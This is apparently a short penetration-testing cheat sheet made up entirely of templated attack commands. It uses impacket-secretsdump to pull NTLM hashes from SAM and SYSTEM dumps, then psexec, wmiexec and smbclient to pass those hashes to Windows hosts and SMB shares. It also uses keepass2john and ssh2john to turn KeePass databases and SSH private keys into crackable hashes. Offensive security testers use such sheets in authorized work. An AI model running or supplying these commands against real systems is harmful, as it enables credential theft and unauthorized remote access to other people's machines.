% password-hash, linux

# get NTLM hashes from SAM + SYSTEM dump
impacket-secretsdump -sam <path_to_SAM_file> -system <path_to_SYSTEM_file> LOCAL

# pass-the-hash (PtH) to windows: impacket-psexec
impacket-psexec -hashes :<NTLM_hash> <username>@<host_address>

# pass-the-hash (PtH) to windows: impacket-wmiexec
impacket-wmiexec -hashes :<NTLM_hash> <username>@<host_address>

# pass-the-hash (PtH) to smb share
smbclient \\\\<host_address>\\<share_name> -U <username> --pw-nt-hash <NTLM_hash>

# format keepass database for use in hashcat
keepass2john <path_to_keepass_file> > <output_file>

# format ssh private key for use in hashcat
ssh2john <path_to_ssh_private_key_file> > <output_file>
